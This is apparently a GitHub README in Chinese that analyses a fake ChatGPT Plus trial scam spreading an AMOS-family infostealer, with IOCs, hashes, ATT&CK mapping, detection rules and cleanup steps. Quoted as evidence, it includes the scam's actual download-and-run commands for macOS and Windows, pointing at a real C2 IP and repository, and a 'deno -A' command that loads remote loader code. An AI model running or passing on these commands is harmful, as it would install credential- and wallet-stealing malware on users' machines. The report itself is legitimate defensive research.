xFabiian/chatgpt-trial-stealer-analysis

GitHub: xFabiian/chatgpt-trial-stealer-analysis

针对跨平台 ChatGPT Plus 诈骗信息窃取器的深度分析报告,提供完整的 IOC、YARA/Sigma/Suricata 检测规则及自动化清除脚本。

Stars: 2 | Forks: 0

# ChatGPT Plus 免费试用骗局 - 跨平台信息窃取器 如果您运行了骗局命令,请前往[紧急清除](#-emergency-removal)。 [![恶意软件类型](https://img.shields.io/badge/type-InfoStealer-red)](#) [![平台](https://img.shields.io/badge/platforms-macOS%20%7C%20Windows-lightgrey)](#) [![家族](https://img.shields.io/badge/family-AMOS%20%2F%20Atomic%20Stealer-orange)](#) [![日期](https://img.shields.io/badge/analysis-2026--05--24-blue)](#) ## 概述 在 YouTube、Reddit、Telegram、Discord 和 GitHub 上散布的虚假“ChatGPT Plus 免费试用”活动。它会安装一个跨平台信息窃取器,用于窃取浏览器密码、Cookie、加密钱包、Discord/Telegram token 以及 macOS Keychain 数据。 该恶意软件运行在 MaaS 平台上。附属成员购买访问权限并启动他们自己的活动。此处分析的样本使用标识“alex”(用户 ID `600bf5e68c9cf61a`)。 关键词:ChatGPT 骗局、信息窃取器、AMOS stealer、Atomic Stealer、ClickFix、Deno 恶意软件、macOS 恶意软件、Windows 恶意软件、MaaS、加密钱包窃取器、浏览器密码窃取器 ## 传播途径 此活动出现在以下位置: - YouTube 视频:[1](https://www.youtube.com/watch?v=15hp_jTW4s8)、[2](https://www.youtube.com/watch?v=3tN0fB0t_UM) - YouTube 社区帖子:[链接](https://www.youtube.com/post/UgkxWUulxH7zXJ8SdMMRz0LcSB1lNjdPRGgO) - GitHub 仓库:`ai-gen-profi/chatgpt-trial-gen` - Reddit、Telegram、Discord 帖子 受害者被告知“官方网页版暂时不可用”,应该改为运行终端命令。该命令会下载并运行恶意软件。 ## 骗局命令的作用 macOS: ``` cd $TMPDIR && curl -O http://45.137.99.121/claude && xattr -c claude && chmod +x claude && ./claude ``` Windows: ``` curl -Lo %temp%\s.msi https://raw.githubusercontent.com/ai-gen-profi/chatgpt-trial-gen/main/gpt.msi && msiexec /i %temp%\s.msi ``` `xattr -c` 会移除 macOS 隔离标记。没有任何合法软件会要求这样做。 ## macOS 分析 - Mach-O 通用二进制文件 (x86_64 + arm64) - 674 KB(旧版本)或 591 KB(新版本) - 使用 C++ 编译 (libc++, libSystem) - 无代码签名(这就是为什么需要 xattr -c 的原因) - 使用 CommonCrypto:`CCCrypt` (AES) + `CCKeyDerivationPBKDF` (PBKDF2) - 所有字符串在 `__data` 中进行 AES 加密(约 384 字节的高熵数据块) - 无 socket API(socket、connect、send、recv)- 使用 `popen()` 启动系统 `curl` 进行 C2 通信 - 链接:`CCCrypt`、`CCKeyDerivationPBKDF`、`std::filesystem::recursive_directory_iterator`、`popen`、`system`、`fork`、`setsid`、`getpwuid` 五个 591 KB 的版本(`autotune`、`finalcut`、`logicpro`、`kontakt8`、`zenology`)在字节级别有 99.88% 相同。仅在加密配置数据块中(每个构建版本的 salt/IV)有约 730 字节的差异。 ## Windows 分析 ### 阶段 1 - MSI 安装程序 | 字段 | 值 | |---|---| | 作者 | Alpha29 | | 主题 | echo_app15 | | 备注 | kontakt8 | | 构建工具 | msitools 0.106.31-bf14 (Linux) | | 创建时间 | 2026-05-16 15:11:57 UTC | 自定义操作 `RunLauncher` 在 InstallFinalize 之后运行 `kilo_piece66.cmd`。该 cmd 文件通过 PowerShell 隐藏启动 `lima26.ps1`。 ### 阶段 1.5 - lima26.ps1 1. 绕过 ExecutionPolicy 2. 从 get.scoop.sh 安装 Scoop 包管理器 3. 通过 Scoop 安装 WinGet 4. 通过 WinGet 安装 Deno (`DenoLand.Deno`) 5. 运行:`deno -A "http://ms-telemetry-gateway-us.com/acca66ea4f9f6efe.js"` 这滥用了合法工具(Scoop、WinGet、Deno),因此 AV/EDR 只会看到正在安装已知且带有签名的软件。 ### 阶段 2 - 混淆的 JS 加载器 - 17 KB,使用 obfuscator.io 混淆 - 提取的 JWT payload: ``` { "buildId": "acca66ea4f9f6efe", "buildNote": "kontakt8", "buildType": "msi", "proxyUrls": ["http://ms-telemetry-gateway-us.com"], "userId": "600bf5e68c9cf61a", "userNote": "alex", "iat": 1778944316 } ``` - 设置 Run-Key 持久化:`HKCU\...\Run\ = deno -A ` - 锁定 TCP 端口 2744(单实例) - 将机器指纹发送至 C2(用户名 + 主机名 + RAM + OS) - 动态下载阶段 3(针对每个受害者生成) - 心跳循环,间隔约 15 秒 (16121ms) ### 阶段 3 无法进行静态分析。由 C2 针对每个受害者动态生成。需要有效的 JWT 和机器 ID 才能下载。基于 AMOS/Atomic Stealer 家族,这是实际的窃取代码(浏览器凭据、钱包、token 等)。 ## C2 基础设施 **45.137.99.121** - Apache 2.4.58 (Ubuntu),目录列表开启。截至 2026-05-24 仍然活跃。 可公开访问的文件: | 文件 | 大小 | 最后修改时间 | |---|---|---| | claude | 674K | 2026-05-08 16:27 | | tbot | 674K | 2026-05-09 15:40 | | autotune | 577K | 2026-05-16 14:56 | | finalcut | 577K | 2026-05-16 14:56 | | kontakt8 | 577K | 2026-05-16 14:56 | | logicpro | 577K | 2026-05-16 14:55 | | zenology | 577K | 2026-05-16 14:55 | | kontakt8.msi | 13K | 2026-05-16 15:13 | | autotuneplugin | 13K | 2026-05-16 15:14 | | zenology.msi | 13K | 2026-05-16 15:14 | **ms-telemetry-gateway-us.com** - Caddy 反向代理。针对 Windows 受害者的 JWT 认证 C2。 ## MITRE ATT&CK | 技术 | ID | 证据 | |---|---|---| | ClickFix | T1566.003 | “服务不可用,请运行此命令”诱饵 | | 命令和脚本解释器 | T1059.003 | 用于安装 Deno 的 PowerShell | | 生活在陆地 (Living off the Land) | T1105 | 滥用 Scoop、WinGet、Deno | | 启动或登录自动启动执行 | T1547.001 | Run-Key 持久化 | | 创建或修改系统进程 | T1543.001 | LaunchAgent 持久化 | | 来自密码存储的凭据 | T1555 | 浏览器密码提取 | | 通过 C2 通道外泄 | T1041 | popen("curl ...") | | 伪装 (Masquerading) | T1036 | 虚假的 Microsoft 遥测域名 | | 混淆的文件或信息 | T1027 | obfuscator.io、AES 加密字符串 | ## 运营者详情 - NATO 音标命名:Alpha29(MSI 作者)、lima26.ps1、kilo_piece66.cmd、echo_app15(构建主题) - 附属成员标识:alex - 附属成员用户 ID:600bf5e68c9cf61a - 由平台服务器分配的构建 ID acca66ea4f9f6efe ## 文件哈希 (SHA-256) 完整列表见 `iocs/hashes.txt`。 ``` 062d5fc1cfa93e0ad53c985c896017c72acc9e22c889ba3b43c9e238d6d9721d claude 8fe79f33e0d7e01a6c269fdf06a09c918ed66651d92bd5e2da4f8777ca8fd28c tbot 086cb1b17b6e2a2b57651448026d2e7d9af7d463a1374c59ca407bc3f6222abc autotune 22c74438159f69394d18deb8d392daaa9fac09cf9c8c31bca53a80041b9bf12f finalcut d97f51850ed224f560b14d5004751a56a8acf27f079319c53dfc3aa170ba87f2 logicpro f6dc17a584e1e933eac4ff31ddba4fffbc155b7da7c25be79aa3dbb7ab782205 kontakt8 28da68972f3dd7fa7b15064994e5b4e83ed15328972c1674dbf84c7864171f87 zenology c366c04c4646f96dd19d0fa37127c93e2c9620af75252714b5bd2e9efc7457c7 kontakt8.msi 82ad00845559e17e8926af26d384504ebffb998f3779906d529d96dcd5493123 autotuneplugin.msi eefdd9558952183ed3d02a3e277fb8de410e73f08b9508e31642eefc033869f5 acca66ea4f9f6efe.js (Stage 2 loader) ``` ## 网络 IOC 完整列表见 `iocs/network.txt`。 ``` 45.137.99.121 ms-telemetry-gateway-us.com http://45.137.99.121/* http://ms-telemetry-gateway-us.com/* https://raw.githubusercontent.com/ai-gen-profi/chatgpt-trial-gen/* ``` ## 检测规则 `detection/yara/` 中的 YARA 规则 - 4 条基础规则 + 8 条详细规则,涵盖 Mach-O 二进制文件、JS 加载器(混淆和未混淆)、PowerShell 脚本、CMD 批处理文件、JWT token 和 C2 通信模式。 `detection/sigma/` 中的 Sigma 规则 - 4 条规则,涵盖 Deno 加载器执行、PowerShell Scoop/Deno 安装、注册表持久化和 MSI 释放检测。 `detection/suricata/` 中的 Suricata 规则 - 5 条针对发往 C2 域名和 endpoint 的 HTTP 流量的规则。 `detection/snort/` 中的 Snort 规则 - 7 条涵盖所有 C2 通信阶段的规则。 ## 清除脚本 `scripts/remove_windows.ps1` 和 `scripts/remove_macos.sh`。两者都具有试运行模式(`-DryRun` / `--dry-run`),可显示发现结果而不删除任何内容。请先运行此模式。 清除脚本已通过静态审计 - 有关覆盖范围的详细信息,请参见 `analysis/removal_script_audit.md`。Windows 覆盖了当前变体约 95% 的内容,macOS 约 90%。 ## 紧急清除 ### Windows 快速检查 ``` Get-Process deno -ErrorAction SilentlyContinue | Select-Object Id, Path, CommandLine netstat -ano | findstr ":2744" Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" | Format-List Test-Path "HKCU:\Software\Alpha29" ``` ### macOS 快速检查 ``` ps aux | grep -E "(claude|tbot|autotune|finalcut|logicpro|kontakt8|zenology)" | grep -v grep ls ~/Library/LaunchAgents/ | grep -viE "(com\.apple|com\.google|com\.microsoft)" ls -la $TMPDIR | grep -E "(claude|tbot|autotune|finalcut|logicpro|kontakt8|zenology)" ``` ### 自动清除 Windows(以管理员身份): ``` Set-ExecutionPolicy Bypass -Scope Process -Force .\scripts\remove_windows.ps1 ``` macOS: ``` chmod +x scripts/remove_macos.sh sudo ./remove_macos.sh ``` 完整的手动清除步骤包含在清除脚本本身以及 `analysis/removal_script_audit.md` 中。 ### 清除后 修改密码。在您清除恶意软件之前,它可能已经外泄了所有数据。 1. 浏览器保存的密码(尤其是银行、电子邮件、社交媒体) 2. Discord - 修改密码(使旧 token 失效),启用 2FA 3. Telegram - Settings > Devices > Terminate all other sessions 4. 电子邮件密码(用于其他服务的密码重置) 5. 在所有地方启用 2FA(TOTP 应用程序,而非短信) 6. 加密钱包 - 创建新钱包,立即转移资金。将旧钱包视为已被盗用。 7. 保存在浏览器中的信用卡 - 挂失并申请新卡 ## 举报 | 内容 | 位置 | |---|---| | 向 MalwareBazaar 提交哈希 | https://bazaar.abuse.ch/submit/ | | 向 URLhaus 提交 URL | https://urlhaus.abuse.ch/api/#submit | | 向托管滥用行为举报 IP | whois 45.137.99.121 | | 向 T&S 举报 GitHub 仓库 | tos-reports@github.com | | 骗局仓库 | https://github.com/ai-gen-profi/chatgpt-trial-gen (已于 2026-05-24 举报) | ## 如何保护自己 - 不要粘贴并执行您不理解的来自互联网的终端命令 - `xattr -c` / `xattr -d` 是危险信号 - 合法软件从不需要此操作 - `deno -A` / `node --allow-all` 会禁用所有安全边界 - “服务暂时不可用,请改用 API”是典型的 ClickFix 套路 - 在运行任何内容之前检查 GitHub 仓库:账号年龄、星标、分支、贡献者、问题 - 昂贵软件(如 Logic Pro、Kontakt、Final Cut)的免费完整版是不存在的 ## 免责声明 我不对本存储库中的内容承担责任。本内容仅用于教育和防御性安全研究目的。所有 IOC、分析和清除脚本均按“原样”提供。使用风险自负。 ## 许可证 CC0 1.0 Universal。所有 IOC、哈希和分析均可自由重新分发。
标签:AI合规, DAST, DNS 反向解析, HTTP工具, Metaprompt, 信息窃取器, 威胁情报, 应急处置, 开发者工具, 恶意软件分析, 网络信息收集, 防御加固